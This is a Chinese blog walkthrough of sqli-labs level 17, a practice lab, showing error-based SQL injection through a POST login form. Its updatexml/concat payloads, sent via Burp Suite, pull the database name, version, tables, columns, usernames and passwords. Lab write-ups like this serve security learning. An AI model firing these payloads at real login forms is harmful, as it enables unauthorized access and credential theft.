SQL闯关第十七关

已于 2023-08-28 10:32:06 修改
阅读量136 收藏
点赞数 1
分类专栏: SQL闯关 网络安全 文章标签: sql 数据库 网络 学习 网络安全
于 2023-08-07 13:49:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNagk1/article/details/132139786
版权

文章目录

前言

本文介绍的是SQL注入闯关的第17关。笔者推荐使用的浏览器是火狐浏览器,由于第17关与之前的关卡的请求有所不同,不是GET请求,而是POST请求。同时也没有明显的回显。因此就需要Burpsuite进行爆破,在此基础上本文进行了详解。

报错注入流程

在介绍报错注入之前先介绍报错注入所要用到的两个函数。

updatexml和concat

1:updatexml函数格式updatexml(xml_target,xpath_expr,new_xml)

其中xml_target是需要操作的xml片段,new_xml是xml要更改为的值,xpath_expr是xml的路径语言。

2:concat函数的作用为将多个字符串连成一个字符串。

其他一些报错注入函数如下

floor()

extractvalue()

updatexml()

geometrycollection()

multipoint()

polygon()

multipolygon()

linestring()

multilinestring()

exp()

 数据库中演示如下

select updatexml(1,concat(0x7e,(select database()),0x7e),0);

 常用的一些特殊字符转16进制后的数值

0x5c:\

0x3a::

0x7e:~

SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这种手段在联合查询受限且能返回错误信息的情况下比较好用,目前对于各种不同类型数据库,不同版本数据库报错注入时可能并不能通用,常用可以通用的报错注入的方式有两种,xpath注入主键重复导致的报错。

闯关过程

sql第17关的界面图如下

通过这是通过用户名和密码进行登录,所以可以确定是POST请求而不是GET请求。

1:爆出数据库的名

这里先在用户名的位置输入admin,密码上输入111,然后点击submit,在之后进行抓包

这里介绍一下Burpsuite的使用方法。

在抓到包之后鼠标右键点击send to repeater。之后在页面中修改以下代码。

uname=admin&passwd=111&submit=Submit

修改为的代码如下。

uname=admin&passwd=111' or updatexml(1,concat(0x7e,(select database()),0x7e),0)#&submit=Submit

在右侧点击Render结果图如下

 说明数据库的名为security。

2:爆出数据库的版本号

之后将database改为version就可以看到sql的数据库版本号。

uname=admin&passwd=111' or updatexml(1,concat(0x7e,(select version()),0x7e),0)#&submit=Submit

结果图如下。

3:爆出数据库下面的所有的表名

在以上的基础之上,修改的代码如下

uname=admin&passwd=111' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#&submit=Submit

结果图如下

4:爆出表的字段名

在以上的基础上,修改的代码如下。

uname=admin&passwd=111' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='uagents'),0x7e),0)#&submit=Submit

 结果图如下

5:爆出表中的用户名

在以上的基础修改的代码如下

uname=admin&passwd=111' and updatexml(1,concat(0x7e,(select group_concat(username)from (select username from users)a),0x7e),0)#&submit=Submit

结果图如下

其中a是派生表的别名。

6:爆出密码

在以上的基础修改的代码如下


uname=admin&passwd=111' and updatexml(1,concat(0x5c,(select group_concat(password) from (select password from users)a),0x7e),0)#&submit=Submit

结果图如下

这里不要以为出错了,其实正是通过这种报错表名密码是什么。 

总结

由于sql注入的第17关没有明显的回显,且是POST请求。因此可以采用报错注入,通过在Burpsuite中最终爆出库的名字,表的名字,字段的名字,用户名和密码。

转瞬都有
关注
专栏目录
SQL注入(闯关游戏)
m0_52326740的博客
08-05 1392
我们发现注入点就在uagent这里因为HTTP_USER_AGENT是可控的,是可以更改的,但是要保证自己的账号密码正确才可以走到那里面去,才可以注入。明显这里就看出了与get传参的不同,这里的传参的参数只用了两个,因为之前用的*去查的,现在只是用的是username和password去查的。这个是从cookie里面取的,然后cookie里面的uname是设置的,然后只需要改uname的进行改变就可以了。然后改中间的concat()里面的值,无非就是将里面的user()改了()括号里面写sql语句。
sql-labs闯关1-10
ljlrookiebird的博客
04-11 579
原理跟第一相同,单引号报错但是后面加注释又没办法使语句闭合,猜了半天是需要单引号和右括号才能使语句闭合,后台语句为select * from xxx where id=( '1' ) ,我们注入后的语句为:select * from xxx where id = (‘-1’)union select 1,2,database() --+ ')id=1' and if((length(database())>8),sleep(10),0) --+,页面十秒后加载。
sql注入靶场闯关Basic(6-10)详细版
Zqinglele的博客
03-15 1711
1.经过尝试发现是使用双引号'' 进行闭合。
sql-labs 闯关 5~10
qq_44663230的博客
08-14 1736
sql-labs 第5~10 盲注系列
sql-labs 闯关 11~20
qq_44663230的博客
08-21 1561
sql-labs闯关11~20
sql注入靶场闯关Basic(16-20POST型)详细版
Zqinglele的博客
04-19 1021
1.使用特殊符号报错,发现没有回显2.通过尝试发现是使用 ") 闭合。
sql-labs 闯关
m0_73189964的博客
06-09 367
sql前22靶场详解
sql-labs闯关26~31
qq_44663230的博客
09-03 2558
sql-labs闯关26-28a 29~31暂时不做
sqli-labs闯关复现
m0_70638961的博客
08-06 314
我们可以尝试一下在Username进行注入,由于这里不是地址栏,不会进行编码,所以就可以使用#,因为闭合的原因,所以Password可以随便输入。2.-- 空格是mysql的注释符,因为+加号是和空格编码成一样的%20,具体证明可以查看各大官方文档,例如华三。1.正常使用mysql语句是无法查询出来的,由于是字符型,需要使用 ' 单引号来闭合,达到逃脱单引号的控制。不难看出,这样是可以一直推出来的,但是需要尝试特别长的时间,所以我们可以选择爆破,或者用脚本跑出来。提示我们输入数字值得id,我们先输入。
【渗透测试】sqli-labs闯关(11-17)
qq_43168364的博客
04-21 781
第十一:POST型的单引号报错注入点 方法:联合查询 输入用户名密码,打开bp进行抓包。 将抓到的包发送到repeater模块 首先判断闭合的方式是单引号,还是其他的。用单引号闭合时回显正常。 用双引号闭合时没用,回显,可知是用单引号闭合的。 判断列数 可知有两列,接下来我们就可用联合查询了。判断联合查询的回显是否正常。 接下来得到表名,语法:dumb' and 1=2 union......
mysql答题闯关题库
打工之路,一路生花
09-20 2865
mysql题库
sqli-labs Less-17sqli-labs闯关指南 17)--增删改函数介绍
m0_54899775的博客
12-18 699
sqli-labs Less-17sqli-labs闯关指南 17
【渗透测试】sqli-labs闯关(1-10)
qq_43168364的博客
04-20 568
第一
靶场系列:sqllibs安装、sqli-labs靶场搭建以及闯关(1-22
weixin_54626591的博客
12-05 2978
sqllibs安装、sqli-labs靶场搭建以及闯关(1-22
使用LLM和RAG进行数据库查询(文本到SQL)的四大挑战及解决方案
python1234_的博客
10-16 959
WrenAI是您与数据的自然语言接口WrenAI是您与数据的自然语言接口WrenAI是开源的。您可以在您的数据、LLM API和环境中的任何地方部署WrenAI。它带有直观的入门和用户界面,允许您在几分钟内连接和建模数据源中的数据模型。在WrenAI的底层,开发了一个名为“Wren Engine”的框架——LLM的语义层。Wren Engine也在GitHub上开源。
【力扣 | SQL题 | 每日4题】力扣1164,3293,1308,1270
2301_80912559的博客
10-17 940
4 mid,四题都比较简单,没什么难度。
Spring MessageSource国际化原理
最新发布
xsgnzb的专栏
10-17 967
查找code的过程。遍历basenames找到对应的资源文件// 没有变量的情况if (bundle!= null) {// 有变量的情况,使用MessageFormat对变量进行替换if (bundle!= null) {= null) {获得ResourceBundle= null) {try {// ...
mysql学习教程,从入门到精通,sql序列使用(45)
qq_45746668的博客
10-16 393
SQL中,序列(Sequence)是一种数据库对象,用于生成唯一的数值,通常用于自动递增的主键。不同的数据库管理系统(DBMS)对序列的支持和语法可能有所不同。以下是一些常见的DBMS(如Oracle、PostgreSQL和MySQL)中如何使用序列的示例。
mysql学习教程,从入门到精通,SQL导入数据(43)
qq_45746668的博客
10-14 959
这通常涉及将数据从一个源文件(如CSV文件)导入到数据库表中。在这个例子中,我们将使用MySQL数据库和一个CSV文件作为数据源
sqllibs 闯关
08-25
- *1* *3* [sql-lib 闯关课程第一课](https://blog.csdn.net/m0_37175113/article/details/105753588)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

转瞬都有

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值